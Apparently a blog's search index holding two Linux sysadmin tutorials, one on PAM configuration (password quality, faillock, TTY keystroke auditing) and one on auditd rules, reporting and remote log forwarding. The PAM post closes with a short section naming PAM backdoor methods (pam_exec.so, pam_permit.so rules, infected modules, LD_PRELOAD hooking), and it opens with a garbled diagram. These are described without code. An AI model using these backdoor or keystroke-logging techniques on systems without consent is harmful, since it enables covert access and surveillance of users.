─ ─ ─ ─ ─ ─ ─ ─ ─ p ─ ┐ │ │ │ │ ┘ ─ ─ a ─ ─ ─ m ─ ─ ─ _ ─ ┌ │ │ │ └ ─ ─ t ─ ─ ─ ─ P ─ t ─ ─ ┬ │ │ │ │ │ │ │ ▼ ─ A ─ y ─ ─ ─ ─ M ─ _ ─ ─ A ─ ─ ─ a ─ ─ P ─ ─ ─ u ─ ─ P ─ ─ ─ d ─ ─ ─ ▲ │ │ │ │ │ │ │ ┴ ─ i ─ ─ 2 ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┬ │ ┴ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ ─ ─ ( ─ ─ ─ a ─ ─ ─ n ─ ─ ─ d ─ ─ ─ ─ ─ ─ o ─ ─ ─ t ─ ─ ─ h ─ ─ ─ e ─ ─ ─ r ─ ─ ─ ─ ─ ─ l ─ ─ ─ i ─ ─ ─ b ─ ─ ─ r ─ ┌ │ │ │ └ ─ ─ a ─ ─ ┬ │ │ │ │ │ │ │ ▼ ─ ─ r ─ ─ ─ ─ ─ i ─ ─ A ─ ─ ─ e ─ ─ P ─ ─ ─ s ─ ─ P ─ ▲ │ │ │ │ │ │ │ ┴ ─ ) ─ ─ ─ ─ ─ ─ ─ 3 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ ┤ │ ┘ Assume the user attempts to log into APP 1, which checks the PAM to see if the user is authenticated and authorised. If the query is successful, PAM returns the status code PAM_SUCCESS; otherwise, it returns one of the other relevant codes. The complete list of return codes and their meanings can be found in their github repository, which can be found here. 1\nConfiguring PAM PAM\u0026rsquo;s main feature is the module configuration it offers. PAM looks at these text configuration files to determine what security actions to take for an application, and the administrator can add or remove new rules at any time. PAM is also extensible, which means that if we want to add new features (such as 2FA/MFA), we only need to change a few files and login can now use them.\nIn RedHat based systems, all of the pam config files can be easily located with the below command.\n$ rpm -ql pam | grep /etc /etc/pam.d /etc/pam.d/config-util /etc/pam.d/fingerprint-auth /etc/pam.d/other /etc/pam.d/password-auth /etc/pam.d/postlogin /etc/pam.d/smartcard-auth /etc/pam.d/system-auth /etc/security /etc/security/access.conf /etc/security/chroot.conf /etc/security/console.apps /etc/security/console.handlers /etc/security/console.perms /etc/security/console.perms.d /etc/security/group.conf /etc/security/limits.conf /etc/security/limits.d /etc/security/limits.d/20-nproc.conf /etc/security/namespace.conf /etc/security/namespace.d /etc/security/namespace.init /etc/security/opasswd /etc/security/pam_env.conf /etc/security/sepermit.conf /etc/security/time.conf There are two main directories here: /etc/pam.d and /etc/security. Both of these directories play important roles in configuring PAM behaviour.\nEach file in the /etc/pam.d folder contains rules that are read by PAM at runtime. If the user attempts to login via ssh, he must be authenticated. PAM checks rules from the sshd file in the /etc/pam.d/ folder after sshd sends an authentication request to PAM. If the file is present, the file\u0026rsquo;s rules are read and a proper response is returned to the application. If the file is missing, the default behaviour is to read the rules from other file in same directory and act on them.\nLet\u0026rsquo;s take a look at /etc/pam.d/ folder to get better picture of what\u0026rsquo;s in it.\n$ ls -l /etc/pam.d -rw-r--r--. 1 root root 192 Feb 2 2021 chfn -rw-r--r--. 1 root root 192 Feb 2 2021 chsh -rw-r--r--. 1 root root 232 Apr 1 2020 config-util -rw-r--r--. 1 root root 287 Jan 13 2022 crond lrwxrwxrwx. 1 root root 19 Nov 18 13:01 fingerprint-auth -\u0026gt; fingerprint-auth-ac -rw-r--r--. 1 root root 702 Nov 18 13:01 fingerprint-auth-ac -rw-r--r--. 1 root root 796 Feb 2 2021 login -rw-r--r--. 1 root root 154 Apr 1 2020 other -rw-r--r--. 1 root root 188 Apr 1 2020 passwd lrwxrwxrwx. 1 root root 16 Nov 18 13:01 password-auth -\u0026gt; password-auth-ac -rw-r--r--. 1 root root 1033 Nov 18 13:01 password-auth-ac -rw-r--r--. 1 root root 155 Jan 25 2022 polkit-1 lrwxrwxrwx. 1 root root 12 Nov 18 13:01 postlogin -\u0026gt; postlogin-ac -rw-r--r--. 1 root root 330 Nov 18 13:01 postlogin-ac -rw-r--r--. 1 root root 681 Feb 2 2021 remote -rw-r--r--. 1 root root 143 Feb 2 2021 runuser -rw-r--r--. 1 root root 138 Feb 2 2021 runuser-l lrwxrwxrwx. 1 root root 17 Nov 18 13:01 smartcard-auth -\u0026gt; smartcard-auth-ac -rw-r--r--. 1 root root 752 Nov 18 13:01 smartcard-auth-ac lrwxrwxrwx. 1 root root 25 Nov 18 12:57 smtp -\u0026gt; /etc/alternatives/mta-pam -rw-r--r--. 1 root root 76 Apr 1 2020 smtp.postfix -rw-r--r--. 1 root root 904 Nov 24 2021 sshd -rw-r--r--. 1 root root 540 Feb 2 2021 su -rw-r--r--. 1 root root 200 Oct 14 2021 sudo -rw-r--r--. 1 root root 178 Oct 14 2021 sudo-i -rw-r--r--. 1 root root 137 Feb 2 2021 su-l lrwxrwxrwx. 1 root root 14 Nov 18 13:01 system-auth -\u0026gt; system-auth-ac -rw-r--r--. 1 root root 1031 Nov 18 13:01 system-auth-ac -rw-r--r--. 1 root root 129 Sep 1 14:57 systemd-user -rw-r--r--. 1 root root 84 Nov 24 2021 vlock There are more files than what the rpm command above revealed. The reason for this is straightforward: we examined files installed by the pam package itself. Other files are installed by the packages that they belong to. The openssh-server package, for example, installed the sshd file.\n$ rpm -qf /etc/pam.d/sshd openssh-server-7.4p1-22.el7_9.x86_64 We now know that pam has rule files for each application as well as a default other file for all applications that do not have dedicated rule files. We won\u0026rsquo;t always need this, but it\u0026rsquo;s a good idea to keep it in the back of our minds.\nLet\u0026rsquo;s take a closer look at these rules from the sshd file.\n$ cat /etc/pam.d/sshd #%PAM-1.0 auth\trequired\tpam_sepermit.so auth substack password-auth auth include postlogin # Used with polkit to reauthorize users in remote sessions -auth optional pam_reauthorize.so prepare account required pam_nologin.so account include password-auth password include password-auth # pam_selinux.so close should be the first session rule session required pam_selinux.so close session required pam_loginuid.so # pam_selinux.so open should only be followed by sessions to be executed in the user context session required pam_selinux.so open env_params session required pam_namespace.so session optional pam_keyinit.so force revoke session include password-auth session include postlogin # Used with polkit to reauthorize users in remote sessions -session optional pam_reauthorize.so prepare Lines beginning with # are clearly identified as comments, while the rest of the lines contain a single rule in a line.\nEach rule follows a similar structure but uses different keywords. The generic rule syntax looks like this:\ntype control module [modules arguments] There are 4 types of type in the PAM rules file.\nauth : rules for authentication. account : rules for account management, like expired passwords and allowed time of login. password : rules for password management, like checking password quality. These rules are only used when applications are changing the password used for auth. session : rules for session management. They typically run at the start or end of the session. And there are 6 common types of control:\nrequired : if it fails, everything fails; if it passes, go to next. sufficient : if it passes, everything passes; if it fails, go to next. requisite : same as required- but stops on error. optional : pam ignores it (pass or fail); if this is the only module in stack then it decides if fail or pass. include : include rules from other pam files. if stack fails, return control to application. substack : works like include. but if the substack fails, return to the parent stack instead of giving control back to application. The module (and any parameters, if any) follows. By default, PAM will look for modules in the /usr/lib64/security directory, but you can prevent this behaviour by specifying the absolute path of the module. Some modules rely on external configuration files, which can be found in the /etc/security directory.\nFew common modules Before delving into the actual PAM rules files, we should first understand how a few of the most common modules behave. This will make interpreting the rules from the rules file much easier.\npam_succeed_if.so This module is designed to succeed or fail auth based on the characterstics of the user trying to log in and the arguments passed to the module. If all the arguments passed to the module matches the characterstics of the user trying to log in, then and only then, this module returns success.\npam_selinux.so This command sets the apropriate selinux security context. This can be used to set context when a session starts and restore it back.\npam_permit.so This is the simplest of all. It just permits acess and does nothing else. With that said, you should consider this module very dangerous in wrong hands.\npam_limits.so As its name suggests, this module sets the limits on the system resources for a user-session. Root user(uid=0) are also affected with this module.\nThere are many limits that can be configured, so there is a dedicated folder to host configuration files for it - /etc/security/limits.d. Alternatively, there is a /etc/security/limits.conf file. But its a good practice to have separate config files if possible.\npam_pwquality.so This module was developed by RedHat. The only action of this module is to prompt the user for the password and check its strength. To check its strenght, the modules uses a dictionary (of weak password) to see it the entered password is part of it. If the password is not in the list, then that password is checked against a set of rules defined by admin.\nThese rules are configurable either by the use of module arguments or /etc/security/pwquality.conf config file.\npam_rootok.so This rule authenticates the user if the real uid is 0. No questions asked!\nIf you don\u0026rsquo;t know about what is a real and effective UID, read this 2.\npam_faildelay.so This module sets the delay on failure. Like when a user types wron password, it fails and the next prompt is delayed by this module. If the delay is not given, then it will use FAIL_DELAY from /etc/login.defs.\npam_unix.so This is the standard unix authnetication module. Usually it uses /etc/passwd and /etc/shadow (if shadow is enabled) to authenticate the user. There are many tasks that can be performed by this module like checking the expire or last change of the password.\nThe session component of this module logs when user logins or logs out of the system.\npam_deny.so Just like pam_permit.so, this module is very simple and straightforward. This denies the access to everybody.\npam_warn.so This module logs the service, terminal, user, or anything to syslog. This module always return PAM_IGNORE, so it just log events and have no participation in authentication process apart from that.\nWe\u0026rsquo;re almost there now. Before we go any further, there are a few more things we should consider:\nPAM rules are parsed from top to bottom. If a sufficient rule is passed, then none of the below rules will be checked.\nSome of the rules start with - character, indicating that PAM should ignore them silently if the module is missing.\nIf you want to know anything about a module, there is usually a man page available. The majority of the manpages for these modules provide examples of usage and return types.\nMaking changes to PAM files has immediate effect. You do not need to restart. As a result, it\u0026rsquo;s a good idea to keep a backup of the files before making any changes.\nAny error in the PAM files has the potential to log you out of your system permanently. Keeping a live root shell while testing is therefore beneficial. If you made a mistake, you can undo your changes using this shell.\nUsecases enforcing strong passwords Let\u0026rsquo;s apply everything we\u0026rsquo;ve learned so far to observe how PAM responds to password changes made with the passwd utility.\nWe now know that the /etc/pam.d/passwd file will be used by passwd (if it exists; else, /etc/pam.d/other will be read). This file will provide the procedures to be followed when sshd is used for any type of authentication and authorization.\nThis makes it obvious for us to go and checkout the /etc/pam.d/passwd file\u0026hellip;\n$ cat /etc/pam.d/passwd #%PAM-1.0 auth include\tsystem-auth account include\tsystem-auth password substack\tsystem-auth -password optional\tpam_gnome_keyring.so use_authtok password substack\tpostlogin Analysing this file let us know that this module includes system-auth rules file. So we\u0026rsquo;ll now inspect the rules mentioned in /etc/pam.d/system-auth file.\n$ cat /etc/pam.d/system-auth #%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth required pam_faildelay.so delay=2000000 auth sufficient pam_unix.so nullok try_first_pass auth requisite pam_succeed_if.so uid \u0026gt;= 1000 quiet_success auth required pam_deny.so account required pam_unix.so account sufficient pam_localuser.so account sufficient pam_succeed_if.so uid \u0026lt; 1000 quiet account required pam_permit.so password requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so session optional pam_keyinit.so revoke session required pam_limits.so -session optional pam_systemd.so session [success=1 default=ignore] pam_succeed_if.so service in crond quiet use_uid session required pam_unix.so Only the password type is relevant for our intended task out of all of these rules.\npassword requisite pam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so requisite\tpam_pwquality.so try_first_pass local_users_only retry=3 authtok_type= This rule checks the quality of password using some predefined configuration that are mentioned in /etc/security/pwquality.conf or can be explicitely dictated via module arguments. The try_first_pass option tells to load the password from previous rule (if any), else this module will make prompt user for password. local_users_only option will tell pam_pwquality.so module to ignore the users that are not in the /etc/passwd file. retry option is the number of tries a user gets to pick an acceptable password before the module returns an error. By default, the prompt the user gets when entering their password is \u0026ldquo;New password:\u0026rdquo;. If the administrator sets authtok_type=FOO, the prompt becomes \u0026ldquo;New FOO password:\u0026rdquo;. Here the default behaviour will be expected.\nsufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok For pam_unix, the sha512 option means use a password hashing routine based on the SHA512 algorithm. blowfish is also supported along with several other, less secure, choices. The shadow option means maintain password hashes in a separate /etc/shadow file that is only readable by the root user. This option should always be set. nullok means allow user accounts that have null password entries. Personally, I would recommend removing this option.\nrequired pam_deny.so If the above modules failed, this should return with a deny message.\nNow, say you want to enforce the following policy\u0026hellip;\n- prompt 2 times for password in case of an error (retry option) - 12 characters minimum length - at least 6 characters should be different from old password when entering a new one (difok option) - at least 1 digit (dcredit option) - at least 1 uppercase (ucredit option) - at least 1 lowercase (lcredit option) - at least 1 other character (ocredit option) - cannot contain the words \u0026quot;qwerty\u0026quot; and \u0026quot;password\u0026quot; - enforce the policy for root as well. \u0026hellip; necessary changes that are needed to make are as below\npassword requisite pam_pwquality.so try_first_pass local_users_only retry=2 minlen=12 difok=6 dcredit=-1 ucredit=-1 ocredit=-1 lcredit=-1 [badwords=qwerty password] enforce_for_root password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok password required pam_deny.so The changes to the system-auth file described above will affect all applications that rely on that rule file. If changes are made to the passwd file, they will only affect the passwd utility.\nWe can also use the authconfig utility to make nearly all of these changes without having to interact directly with the associated files. More information can be found here . 3\nlock out at multiple failed attempts We can also use PAM to configure the system so that if a single user makes multiple failed attempts, the PAM will lock out that user for a set period of time. Similarly to how your mobile device locks out the user for the next few hours if multiple login attempts fail.\nThis is possible with the pam faillock module. Because there is no dedicated config file for this module, all configuration will be done through module arguments. You can either manually edit the rule files with your favourite text editor or use the authconfig utility to make changes.\nBefore you begin, you must determine whether or not pam_faillock is enabled. This can be verified using\nauthconfig --test | grep pam_faillock For me the default output was\npam_faillock is disabled (deny=4 unlock_time=1200) So I had to enable it via authconfig --enablefaillock and along with that you can pass module arguments via authconfig --faillockargs=\u0026lt;module_options\u0026gt; flag.\nOr, one can combine both of the actions in a single command like\nauthconfig --enablefaillock --faillockargs=\u0026#34;fail_interval=30 deny=3 unlock_time=3600\u0026#34; --update The above command will add pam_faillock rule in all of the relevant rules file (located in /etc/pam.d/ directory). And the rest of the commands will configure the behaviour of the pam_faillock module. All of the module options can be checked with man pam_faillock.\nNow the output of below command is slight different.\nauthconfig --test | grep pam_faillock Output:\npam_faillock is enabled (fail_interval=30 deny=3 unlock_time=3600) You can list the failed login attempts with the faillock command.\nTTy auditing ( *cough* keylogging *cough*) Audit system (In Redhat or similar linux distros) uses pam_tty_audit PAM module for auditing of TTY input. When user logins, this module logs all keystrokes that user makes to /var/log/audit/audit.log file.\nSince this depends on auditd service and requires that to be configured and running properly.\nThere is no authconfig flag that can enable this (atleast, there is none in centos 7.5), so we\u0026rsquo;ll have to follow the traditional way of editing files manually to configure it.\nThis module only provides support for session type. That means we can only add session rules to our required files and it\u0026rsquo;ll take effect immidiately for that service.\nMy idea is to add this rule in /etc/pam.d/system-auth and /etc/pam.d/password-auth.\nsession required pam_tty_audit.so enable=* The above rule will capture all of the tty inputs as it is and store them in /var/log/audit/audit.log file (by default). You can easily grep stuff from that or use a proper tool to query the logs\u0026hellip; like aureport.\naureport --tty command filters all TYPE=tty logs events from the file and display them in very human readable format.\nbackdooring Till this point, we have learnt a lot about PAM and it is time to rethink on the basics once again. PAM has 3 components: user, password and service. It\u0026rsquo;s role is to authenticate a user to a service with provided password.\nIt works elegantly with the help of some service files of same name as of the service itself. These files are located in /etc/pam.d/ directory. Each file has one or more rules that helps PAM to take proper decisions.\nThere are a lot of methods with which we can backdoor the PAM system. One of the many ways is to use pam_exec.so module to run an arbitrary command at each PAM based event. Another way could be to add rule using pam_permit.so module, that will skip the required checks to authenticate user for that service.\nThe above techniques are very noisy and are easily detected. More sophesticated attacks would include replacing the original module with custom compiled infected module on target system\u0026hellip; or function hooking via LD_PRELOAD technique.\nI\u0026rsquo;ll leave the practical part upto you. Please don\u0026rsquo;t do anything stupid or unethical on production server or any other system without the owner\u0026rsquo;s consent.\nKeep it healthy and stay safe!!\nResources: https://likegeeks.com/linux-pam-easy-guide/ https://aplawrence.com/Basics/understandingpam.html https://www.linux.com/news/understanding-pam/ https://developer.ibm.com/tutorials/l-pam/ https://github.com/linux-pam/linux-pam (Source code) https://wiki.archlinux.org/title/PAM#Examples https://lwn.net/Articles/470764/ (A look at PAM face-recognition authentication) https://lwn.net/Articles/523199/ (Google Authenticator for multi-factor authentication) https://github.com/linux-pam/linux-pam/blob/b872b6e68a60ae351ca4c7eea6dfe95cd8f8d130/libpam/include/security/_pam_types.h#L29\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n(https://stackoverflow.com/questions/32455684/difference-between-real-user-id-effective-user-id-and-saved-user-id)\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/system-level_authentication_guide/authconfig-pwd#authconfig-pwd-cmd\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/12/pluggable-authentication-modules-linux/","summary":"PAM - What and Why Authenticating a user to a service used to be a time-consuming process. The application had to be aware of all possible authentication mechanisms and had to be rebuilt every time a new authentication method was introduced\u0026hellip; As a result, there was a significant amount of code repetition. Naturally, it was disliked by everyone!!\nAs a result, the concept of a middle-ware application responsible for user authentication to a service arose.","title":"Pluggable Authentication Modules - Linux"},{"content":"Audits are critical for system administrators to detect security violations and track security-relevant information on their systems. Anyone concerned about the security, stability, and proper operation of their Linux servers should conduct an audit.\nHow to do auditing in linux One simple way is to use the history command to observe the shell\u0026rsquo;s history, but this has many limitations. One of them is that this command is only applicable to the current user. You can still get around this by reading the .bash_history file in each user\u0026rsquo;s home directory (given you have permissions to do so).\nAudit framework in kernel. The Linux audit framework is a better option. Because it operates at the kernel level, it has a lot of visibility over almost everything. The Linux kernel sends significant events to user-space (auditd) so that they can be recorded in a file. This file can then be analysed on the host system or sent to a remote location for storage and analysis.\nUser-space auditd The majority of Linux distributions come with auditd preinstalled, which begins and stops with the system (as a systemd service file). Using below command, you may determine whether the kernel was built using the audit options.\ngrep -i audit /boot/config-`uname -r` On my system, it gives me below output (indicating kernel was built with auditing feature)\nCONFIG_AUDIT_ARCH=y CONFIG_AUDIT=y CONFIG_AUDITSYSCALL=y CONFIG_AUDIT_WATCH=y CONFIG_AUDIT_TREE=y CONFIG_NETFILTER_XT_TARGET_AUDIT=m CONFIG_IMA_AUDIT=y CONFIG_KVM_MMU_AUDIT=y Second thing you would want to check if the kernel thread process responsible for sending data to user-space is running. Check that with the ps command.\nsudo ps -aux | grep -i kauditd This gives me below output (indicating that the thread is running)\nroot 103 0.0 0.0 0 0 ? S 11:39 0:00 [kauditd] Final thing is to check the user-space service responsible to get the data from kauditd. To obtain definitive indications on systemd systems, use the commands listed below.\nsystemctl is-active auditd ## Returns: active/inactive systemctl is-enabled auditd ## Returns: enabled/disabled (Note: Feel free to check the source code at kernel/audit.c. 1)\nConfiguring auditd Auditd decides what to log and what not to log using a set of rules. These rules can be found in the /etc/audit/rules.d/ folder. Auditd reads files from this folder on startup and generates the /etc/audit/audit.rules file automatically. (This file should not be edited by hand.)\nauditd comes with a configuration file too. This file helps in changing the behaviour of the userspace auditd daemon. Default file on my system looks like below.\n# sudo cat -n /etc/audit/auditd.conf 1\t# 2\t# This file controls the configuration of the audit daemon 3\t# 4\t5\tlocal_events = yes 6\twrite_logs = yes 7\tlog_file = /var/log/audit/audit.log 8\tlog_group = root 9\tlog_format = RAW 10\tflush = INCREMENTAL_ASYNC 11\tfreq = 50 12\tmax_log_file = 8 13\tnum_logs = 5 14\tpriority_boost = 4 15\tdisp_qos = lossy 16\tdispatcher = /sbin/audispd 17\tname_format = NONE 18\t##name = mydomain 19\tmax_log_file_action = ROTATE 20\tspace_left = 75 21\tspace_left_action = SYSLOG 22\tverify_email = yes 23\taction_mail_acct = root 24\tadmin_space_left = 50 25\tadmin_space_left_action = SUSPEND 26\tdisk_full_action = SUSPEND 27\tdisk_error_action = SUSPEND 28\tuse_libwrap = yes 29\t##tcp_listen_port = 60 30\ttcp_listen_queue = 5 31\ttcp_max_per_addr = 1 32\t##tcp_client_ports = 1024-65535 33\ttcp_client_max_idle = 0 34\tenable_krb5 = no 35\tkrb5_principal = auditd 36\t##krb5_key_file = /etc/audit/audit.key 37\tdistribute_network = no Some of these options are easy to understand, like:\nlog_file : Tells the location of the audit log file. max_log_file : Defines the size of the log file in MB. If the size is reached, max_log_file_action is triggered. space_left : Triggers the space_left_action when the limit is reached. To include additional information in audit logs you need to change log format from RAW to ENRICHED. FLUSH = INCREMENTAL_ASYNC will write the logs async instead of writing them on every write. While some of them needs more detailed explaination. In any case, always refer the man pages \u0026ndash;\u0026gt; man (5) auditd.conf 2. There you will find all the possible options and their supporting values to tune auditd as per your requirements.\nAfter making changes to auditd.conf, restart the service to pick up new changes from config. My centos 7 machine did not allow me to manually restart the service using systemctl but it worked just fine with service auditd restart. If you figure out why this happens, please let me know!\nInspecting audit logs We can see where the auditd logs are stored from the config file above. So we can always look through the log files and use the good old grep command to find what we\u0026rsquo;re looking for.\nBut that is not the intended method. The audit package includes a number of helper commands to assist the sysadmin/analyst in quickly determining information from logs.\nBelow are all the binary executable files provided by the audit package\u0026hellip;.\n## COMMAND: rpm -ql audit | grep bin /sbin/audispd /sbin/auditctl /sbin/auditd /sbin/augenrules /sbin/aureport /sbin/ausearch /sbin/autrace /usr/bin/aulast /usr/bin/aulastlog /usr/bin/ausyscall /usr/bin/auvirt Let\u0026rsquo;s start with ausearch for now. This program parses the audit log files and gives the information based on passed keywords.\nThere are a lot of options for this tool.. I\u0026rsquo;ll mention few which I use most often.\n-i \u0026ndash; Interpret the logs. Translates numeric value in names. If you want to get raw logs, use -r. use -x to search based on executable name. If you know the event ID then search with -a. To search with message type, use -m. You can get the message type list by passing nothing or a wrong message type with the argument/flag. Use -k to search for specific key in log. You can configure your own key in the logs config. These keys helps to corelate the logs with the rules. If you just want to get a report of everything that was logged, you can use aureport program which gives you a proper summary in a tabular form.\n## COMMAND: sudo aureport Summary Report ====================== Range of time in logs: 01/01/1970 00:00:00.000 - 12/10/2022 16:24:29.088 Selected time for report: 01/01/1970 00:00:00 - 12/10/2022 16:24:29.088 Number of changes in configuration: 2 Number of changes to accounts, groups, or roles: 0 Number of logins: 0 Number of failed logins: 0 Number of authentications: 0 Number of failed authentications: 0 Number of users: 3 Number of terminals: 4 Number of host names: 1 Number of executables: 3 Number of commands: 1 Number of files: 0 Number of AVC\u0026#39;s: 0 Number of MAC events: 0 Number of failed syscalls: 0 Number of anomaly events: 0 Number of responses to anomaly events: 0 Number of crypto events: 0 Number of integrity events: 0 Number of virt events: 0 Number of keys: 0 Number of process IDs: 42 Number of events: 240 Writing custom audit rules auditd also allows us to write our own rules. These rules will be read and applied when the service is restarted\u0026hellip; or if you invoke augenrules --load.\nFor auditing, there are only three types of rules that can be defined:\nWatches on the file system (watches the changes related to filesystem or on a particular path)\nsyscalls (checks if a specific syscall was executed and with what context)\ncontrol rules (these are used to modify the kernel configuration of linux audit)\nThat\u0026rsquo;s all. This was all we needed to know before we started writing our first simple rule.\n-w /etc/ The above rule will watch for all kinds of changes in /etc/ folder\u0026hellip; that means any (r)ead, (w)rite, (e)xecute or (a)ttribute change operations will be logged.\nLet\u0026rsquo;s write the above rule in a new file: /etc/audit/rules.d/myrules.rules\u0026hellip; And check if it is picked up by auditd already. (I know it will not be picked, but it won\u0026rsquo;t hurt to check)\n# sudo auditctl -l No rules Now, let\u0026rsquo;s restart the service and try that again.\n# service auditd restart # sudo auditctl -l -w /etc -p rwxa auditd has now loaded the rule, as expected. But there\u0026rsquo;s more to it than just what we put in the file. It makes no difference, however, because it is implicitly adding -p rwxa to indicate that all of these operations should be monitored.\nThe files still contain what we added\u0026hellip; but the kernel has fully expanded rules.\n# sudo cat /etc/audit/rules.d/myrules.rules -w /etc/ # sudo cat /etc/audit/audit.rules ## This file is automatically generated from /etc/audit/rules.d -D -b 8192 -f 1 -w /etc/ With this rule in the kernel, all the operations made to /etc path will be recorded. To make things easy, think of all the watch rules as just fancy wrappers for syscall rules. Above rule can be written as below, and will still work the same.\n-a exit,always -F dir=/etc -F perm=rwxa Remove the previous rule and add the above rule to the same file. Restart the service again for the changes to take effect.\n$ sudo cat /etc/audit/audit.rules ## This file is automatically generated from /etc/audit/rules.d -D -b 8192 -f 1 -a exit,always -F dir=/etc -F perm=rwxa Auto-generated event is what we wrote in the file. Let\u0026rsquo;s take a look what it looks like from kernel point of view.\n$ sudo auditctl -l -w /etc -p rwxa Told you, its practically the same. Now let\u0026rsquo;s understand all the options in the new rule we wrote (obviously for better clarity on how it is same).\n-a exit,always -F dir=/etc -F perm=rwxa -a : append rule to end of the list exit,always : always log when exiting a syscall. -F : build a rule based on (F)ield values dir=/etc: full path of directory to watch; watches recursively to whole subtrees. perm=rwxa: permission changes/access to monitor. According to man 8 auditctl, if a field rule is given and no syscall is specified, it will default to all syscalls. That means the above rule will work for all of the syscalls.\nSo far so good. Now what about control rules?? ..Or let\u0026rsquo;s say configure rules as they help in configuring the behaviour of auditd itself.\nThese rules help in configuring/controling the behaviour of auditd. Read the man page for better and complete explanation. But I\u0026rsquo;ll walk you through the ones we have already seen\u0026hellip;. in the /etc/audit/audit.rules file.\n-D -b 8192 -f 1 -D deletes all the previous rules from kernel rules list. This should be always on the top If you want to give someone a hard time, just put that in the end.(please don\u0026rsquo;t do it on production machines, it won\u0026rsquo;t be funny)\n-b sets the size for audit buffer. If you don\u0026rsquo;t know what you are doing, leave it to the default.\n-f sets the failure mode that let\u0026rsquo;s the kernel decide how to handle failures and critical errors. 0 is silent. Default is 1 (printk). Super secured environment should be using 2 (panic).\nPre-packaged audit rules Most of the times, we don\u0026rsquo;t really need to write our own audit rules, we can just use what other people have already worked upon. You can always find them with the help of your favorite search engine\u0026hellip;but there are few already pre-packaged with audit and are already on your system (if you have installed the package)\n$ rpm -ql audit | grep \u0026#39;/usr/share/.*\\.rules$\u0026#39; /usr/share/doc/audit-2.8.5/rules/10-base-config.rules /usr/share/doc/audit-2.8.5/rules/10-no-audit.rules /usr/share/doc/audit-2.8.5/rules/11-loginuid.rules /usr/share/doc/audit-2.8.5/rules/12-cont-fail.rules /usr/share/doc/audit-2.8.5/rules/12-ignore-error.rules /usr/share/doc/audit-2.8.5/rules/20-dont-audit.rules /usr/share/doc/audit-2.8.5/rules/21-no32bit.rules /usr/share/doc/audit-2.8.5/rules/22-ignore-chrony.rules /usr/share/doc/audit-2.8.5/rules/23-ignore-filesystems.rules /usr/share/doc/audit-2.8.5/rules/30-nispom.rules /usr/share/doc/audit-2.8.5/rules/30-ospp-v42.rules /usr/share/doc/audit-2.8.5/rules/30-pci-dss-v31.rules /usr/share/doc/audit-2.8.5/rules/30-stig.rules /usr/share/doc/audit-2.8.5/rules/31-privileged.rules /usr/share/doc/audit-2.8.5/rules/32-power-abuse.rules /usr/share/doc/audit-2.8.5/rules/40-local.rules /usr/share/doc/audit-2.8.5/rules/41-containers.rules /usr/share/doc/audit-2.8.5/rules/42-injection.rules /usr/share/doc/audit-2.8.5/rules/43-module-load.rules /usr/share/doc/audit-2.8.5/rules/70-einval.rules /usr/share/doc/audit-2.8.5/rules/71-networking.rules /usr/share/doc/audit-2.8.5/rules/99-finalize.rules ( NOTE: The numbers in the filenames play a very important role. For auditd, the first rule found wins. So if there are 2 contradictory rules, the first one found will be applied and the second one will have no effect.)\nYou can copy these rules, or just the ones you want to monitor, to /etc/audit/rules.d/ folder and restart the service to pick up the new rules. Or you can use augenrules --load to load them without restarting the service.\nHardening the audit First step to harden the audit will be to ensude auditd\u0026rsquo;s configuration is immutable. This can be done with -e 2 control rule. Enabling this will prevent further changes in auditd\u0026rsquo;s configurations. This being said, it is very obvious that this should be the last rule in the list.\nNext step would be to store the logs into a centralized secure location. Auditd comes with a dispatcher program (auditspd) that can work with auditsp-remote plugin. This program too comes with it\u0026rsquo;s own configuration file, which can be found at /etc/audisp/audisp-remote.conf.\nThis package was not already installed on my system so I installed it with sudo yum install -y audispd-plugins. Once this is installed, auditsp-remote.conf will be there witing for you to edit.\nThere are a few configuration changes you\u0026rsquo;ll need to make to ensure that logs are sent to the remote server. The overall concept is to collect logs using auditd, then use a plugin to send logs to a central server while also disabling local logging of the same logs. This way, we won\u0026rsquo;t have logs on the local system (saving disk space), and we can aggregate logs from multiple servers for analysis.\nLet\u0026rsquo;s start it with one change at a time. First one will be to enable the remote logging plugin. To do that, we can make changes to /etc/audisp/plugins.d/au-remote.conf.\n## CHANGE active status to yes active=yes Then let our audit dispatcher know about the remote server where we want to dispatch the logs. This change will be made to /etc/audisp/audisp-remote.conf\n## Remote server name/IP and the port remote_server = 192.168.56.10 port = 60 As a dirty trick, I\u0026rsquo;ve started netcat on port 60 to listen to the incoming data from the host.\nLast thing is to disable the local logging for auditd. For that, make changes to /etc/audit/auditd.conf.\n## CHANGE write logs to no write_logs = no With this done, you have everything configured and ready to test. Now restart the auditd service and you\u0026rsquo;ll start getting logs in netcat screen on remote system.\nWrap-up In this article, you learnt about how to do better auditing of your linux environment, with the help of auditd. You also learnt about how to write your own rules or get pre-packaged rules to generate specific audit logs\u0026hellip; and ways to get required reports with the help of ausearch and aureport programs.\nThis article is not intended to be a complete guide for auditing. It\u0026rsquo;s whole purpose is to get you started with the idea of auditing and using the audit package utilities.\nIf you want to learn more about it, I suggest you to play around and read RedHat\u0026rsquo;s documentation on system auditing 3. And if you are stuck, use your favorite search engine or\u0026hellip; 